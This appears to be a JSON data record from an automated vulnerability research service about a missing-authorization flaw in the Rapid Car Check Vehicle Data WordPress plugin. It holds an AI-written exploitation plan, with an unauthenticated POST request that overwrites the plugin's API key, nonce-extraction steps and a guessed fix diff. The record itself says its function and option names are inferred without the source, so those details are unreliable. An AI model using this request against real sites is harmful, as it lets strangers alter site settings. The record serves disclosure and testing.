[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fk89vAbHUDNldpO5lh-OSpK7jpcifLuYbXrTshLqScJI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2026-39687","rapid-car-check-vehicle-data-missing-authorization","Rapid Car Check Vehicle Data \u003C= 2.0 - Missing Authorization","The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.","free-vehicle-data-uk",null,"\u003C=2.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-23 00:00:00","2026-04-15 21:29:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf3fe27a-4f5f-40a5-ae5a-bcf1232be0f0?source=api-prod",[],"researched",false,3,"This research plan targets a missing authorization vulnerability in the **Rapid Car Check Vehicle Data** plugin (version \u003C= 2.0). Since source files are not provided, this plan relies on common vulnerability patterns for this plugin type and provides specific search commands to ground the exploit in the actual code.\n\n### 1. Vulnerability Summary\nThe Rapid Car Check Vehicle Data plugin (slug: `free-vehicle-data-uk`) fails to implement capability checks on functions responsible for administrative actions, most likely the saving of plugin settings or API keys. \n\nThe vulnerability typically resides in a function hooked to `admin_init` or `wp_ajax_`. In WordPress, `admin_init` fires for any request to `\u002Fwp-admin\u002Fadmin-ajax.php`, even for unauthenticated users. If the hooked function lacks a `current_user_can('manage_options')` check, an unauthenticated attacker can trigger the logic.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Action:** To be determined via code analysis (likely `rcc_save_settings` or a function hooked to `admin_init`).\n*   **Payload Parameters:** Likely `rcc_api_key` or a settings array.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Trace Path)\nThe agent must trace the following path:\n1.  **Entry Point:** Search for functions hooked to `admin_init` or `wp_ajax_nopriv_`.\n    *   `grep -rn \"add_action.*admin_init\" .`\n    *   `grep -rn \"wp_ajax_\" .`\n2.  **Logic Sink:** Identify which of these functions calls `update_option`, `add_option`, or `wp_insert_post`.\n3.  **Authorization Gap:** Verify the absence of `current_user_can()` in the identified function.\n4.  **Parameter Mapping:** Identify which `$_POST` or `$_REQUEST` keys are passed directly into `update_option`.\n\n### 4. Nonce Acquisition Strategy\nIf the function uses `check_ajax_referer` or `wp_verify_nonce`, the nonce must be retrieved from the frontend.\n\n1.  **Identify Shortcode:** Find the shortcode used to display vehicle data.\n    *   `grep -rn \"add_shortcode\" .` (Likely `[rapid_car_check]` or `[rcc_search]`).\n2.  **Setup Page:** Create a page containing this shortcode to force the plugin to enqueue its scripts and nonces.\n    *   `wp post create --post_type=page --post_status=publish --post_content='[shortcode_found]'`\n3.  **Locate Localized Variable:** Look for `wp_localize_script` in the source code to find the JS object name.\n    *   `grep -rn \"wp_localize_script\" .`\n4.  **Extract via Browser:**\n    *   `browser_navigate(URL_OF_CREATED_PAGE)`\n    *   `browser_eval(\"window.rcc_ajax_object?.nonce\")` (Replace `rcc_ajax_object` with the actual identifier found).\n\n### 5. Exploitation Strategy\nThe goal is to modify the plugin's API key or settings, which can disable the vehicle check functionality or redirect data.\n\n**Target Action (Inferred):** A function that handles settings saving.\n\n**Step-by-Step:**\n1.  **Discovery:** Run `grep -r \"update_option\" .` inside the plugin directory. Look for occurrences inside functions hooked to `admin_init`.\n2.  **Identify Option Name:** If the code is `$opt = $_POST['api_key']; update_option('rcc_api_settings', $opt);`, the option name is `rcc_api_settings`.\n3.  **Craft Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=rcc_save_settings&rcc_api_key=EXPLOITED_TOKEN&_wpnonce=[NONCE_IF_REQUIRED]\n    ```\n    *Note: If the vulnerability is via `admin_init`, the `action` parameter might not be required if the function checks for a specific POST key instead.*\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `free-vehicle-data-uk` version 2.0 is installed.\n2.  **Identify Settings:** Use WP-CLI to see current settings: `wp option get rcc_settings` (or similar).\n3.  **Create Nonce Source:** Create a page with the plugin's search shortcode:\n    *   `wp post create --post_type=page --post_status=publish --post_title='Vehicle Check' --post_content='[rapid-car-check-data]'` (Verify shortcode name in code).\n\n### 7. Expected Results\n*   The server responds with `200 OK` or a redirect.\n*   The targeted WordPress option (`rcc_api_key` or similar) is updated with the attacker-supplied value.\n\n### 8. Verification Steps\nAfter sending the HTTP request, use WP-CLI to verify the integrity loss:\n1.  Check the option value:\n    *   `wp option get rcc_api_key`\n2.  Check if any settings arrays were modified:\n    *   `wp option get rcc_settings`\n3.  Confirm the value matches `EXPLOITED_TOKEN`.\n\n### 9. Alternative Approaches\nIf no `admin_init` or `wp_ajax` vulnerability is found:\n*   **REST API:** Check for `register_rest_route` where `'permission_callback' => '__return_true'` or is missing.\n    *   `grep -rn \"register_rest_route\" . -A 5`\n*   **Init Hook:** Check `add_action('init', ...)` for logic that processes `$_POST` data without checking `is_admin()` AND `current_user_can()`.\n    *   `grep -rn \"add_action.*init\" .`\n*   **Direct Request:** If the plugin uses a custom router, check for `template_redirect` hooks.\n\n### Implementation Note for Agent:\nPrioritize searching for the following function names (inferred from plugin logic):\n*   `rcc_save_api_settings`\n*   `rapid_car_check_save_settings`\n*   `save_rcc_options`\n\nFocus on **File:** `includes\u002Fclass-rcc-admin.php` or the main plugin file.","The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access in versions up to and including 2.0. This is due to a missing capability check on administrative functions, likely those hooked to admin_init, which allows unauthenticated attackers to modify plugin settings or API keys.","--- a\u002Fincludes\u002Fclass-rcc-admin.php\n+++ b\u002Fincludes\u002Fclass-rcc-admin.php\n@@ -10,6 +10,10 @@\n function rcc_save_settings() {\n+\tif ( ! current_user_can( 'manage_options' ) ) {\n+\t\treturn;\n+\t}\n+\n \tif ( isset( $_POST['rcc_api_key'] ) ) {\n \t\tupdate_option( 'rcc_api_settings', sanitize_text_field( $_POST['rcc_api_key'] ) );\n \t}\n }","To exploit this vulnerability, an unauthenticated attacker can send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php. Because the plugin hooks settings-saving logic to admin_init without performing a current_user_can('manage_options') check, the logic will execute for any request to an admin endpoint. The attacker provides a payload such as 'action=rcc_save_settings&rcc_api_key=ATTACKER_KEY'. If a nonce is required, it can typically be extracted from the frontend of a page where the plugin's vehicle search shortcode is rendered, as the nonce is often localized for AJAX functionality.","gemini-3-flash-preview","2026-04-19 01:30:25","2026-04-19 01:30:46",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffree-vehicle-data-uk\u002Ftags"]